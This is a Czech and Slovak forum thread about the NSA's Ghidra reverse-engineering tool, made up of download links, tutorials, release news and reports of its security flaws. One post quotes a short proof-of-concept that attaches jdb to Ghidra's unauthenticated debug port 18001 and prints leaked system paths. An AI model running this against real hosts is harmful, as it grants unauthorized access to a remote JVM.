RE FORUM

[REVERSE ENGINEERING] => Tools => Topic started by: DARKER on March 06, 2019, 08:07:57 AM

Title: Ghidra
Post by: DARKER on March 06, 2019, 08:07:57 AM
Download:
https://ghidra-sre.org/

First Look at Ghidra
https://www.youtube.com/watch?v=285b_DEmvHY (https://www.youtube.com/watch?v=285b_DEmvHY)

Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework
http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html (http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html)
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 03:27:52 AM
Už jsem na to koukal a musím říct, že to vypadá dost dobře. A pokud kolem toho vznikne komunita, bude to velká pecka.

Jen jsem přemýšlel, proč to vlastně uvolňovali. Napadly mě asi dvě možnosti:
1. Hledají nové lidi na konkrétní pozice spojené s RCE
2. Mají něco lepšího (pokud to skutečně vyvíjejí od roku 2000, je to skoro 20 let stará aplikace) a rozhodli se tohle věnovat veřejnosti, aby byli zase jednou za ty hodné
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 03:36:14 AM
Quote
NSA RE Tool 'GHIDRA' Backed Port - Java Debug Wire Protocol (JDWP) Port Opened(TCP/18001)

Exploit PoC:
jdb -attach x.x.x.x:18001 <= No auth

$ jdb -attach x.x.x.x:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>
Title: Re: Ghidra
Post by: DARKER on March 07, 2019, 07:40:50 AM
Myslim si, ze sa im nema o to kto starat, testovat im to, vyvijat, napady ...
Takto sa im o to postaraju ludia, spravia uzitocne pluginy ...
Cim viac sa to bude pouzivat tym to bude vymakanejsie ...
Som zvedavy ako na to zareaguje Ilfak ... (IDA)
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 01:20:12 PM
(https://i.ibb.co/Y0ZNrKr/stuxnet-ghidra.png)
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 01:48:49 AM
Ghidra tutorial
https://www.youtube.com/watch?v=tH9A2zVIzKI (https://www.youtube.com/watch?v=tH9A2zVIzKI)
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 10:11:57 AM
Tak zatím to vypadá, že těch problémů bude víc, než bych čekal  :-X

Aktuálně byla nalezena zranitelnost XXE
https://twitter.com/sghctoma/status/1103392091009413120 (https://twitter.com/sghctoma/status/1103392091009413120)
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 11:53:25 PM
První skripty pro Ghidra.
https://github.com/ghidraninja/ghidra_scripts (https://github.com/ghidraninja/ghidra_scripts)
Title: Re: Ghidra
Post by: Z!L0G80 on March 09, 2019, 11:55:06 PM
tez mi prijde ze chteji comunitu aby jim to vylepsila a docela seto rozjizdi viz issues na githubu nebo treba Toshiba MeP processor module for GHIDRA >> https://github.com/xyzz/ghidra-mep
Title: Re: Ghidra
Post by: DARKER on March 28, 2019, 07:55:27 AM
Ghidra v9.0.1 (March 2019)

Change Log + Download:
https://ghidra-sre.org/releaseNotes.html
Title: Re: Ghidra
Post by: RubberDuck on April 03, 2019, 08:25:24 PM
https://www.reddit.com/r/ghidra (https://www.reddit.com/r/ghidra)
Title: NSA Releases GHIDRA Source Code
Post by: RubberDuck on April 04, 2019, 04:42:48 PM
NSA today finally released the complete source code for GHIDRA version 9.0.2 which is now available on its Github repository.

https://github.com/NationalSecurityAgency/ghidra (https://github.com/NationalSecurityAgency/ghidra)
Title: Re: Ghidra
Post by: Kockatá hlava on June 11, 2019, 07:57:06 AM
16. 5. vyšla Ghidra 9.0.4 (verze 9.0.3 byla přeskočená). Podle changelogu se daří reagovat na bugy reportovaný komunitou a fixovat je.
Title: Re: Ghidra
Post by: Z!L0G80 on June 15, 2019, 02:52:54 PM
pekne ale furt mi to nejak nejde skompilovat :/
Title: Re: Ghidra
Post by: Kockatá hlava on June 16, 2019, 10:40:54 AM
Download release buildu ti nestaci?
Title: Re: Ghidra
Post by: Kockatá hlava on October 07, 2019, 04:59:02 PM
Je k dispozici Ghidra v9.1 BETA. Vypada to, ze je tam hromada improvements a bugfixes:

https://ghidra-sre.org/releaseNotes_9.1.html
Title: Re: Ghidra
Post by: RubberDuck on October 10, 2019, 10:10:18 AM
Flaw in National Security Agency’s Ghidra reverse-engineering tools allows hackers to execute code in vulnerable systems.

https://threatpost.com/bug-in-nsas-ghidra/148787/ (https://threatpost.com/bug-in-nsas-ghidra/148787/)
Title: Re: Ghidra
Post by: Kockatá hlava on May 31, 2021, 10:56:39 AM
V Ghidra 10.0 bude debugger: https://ghidra-sre.org/releaseNotes_10.0beta.html
Title: Re: Ghidra
Post by: RubberDuck on January 18, 2022, 10:59:14 AM
Ghidra se pořád pere s chybou Log4Shell
https://github.com/NationalSecurityAgency/ghidra/issues/3736 (https://github.com/NationalSecurityAgency/ghidra/issues/3736)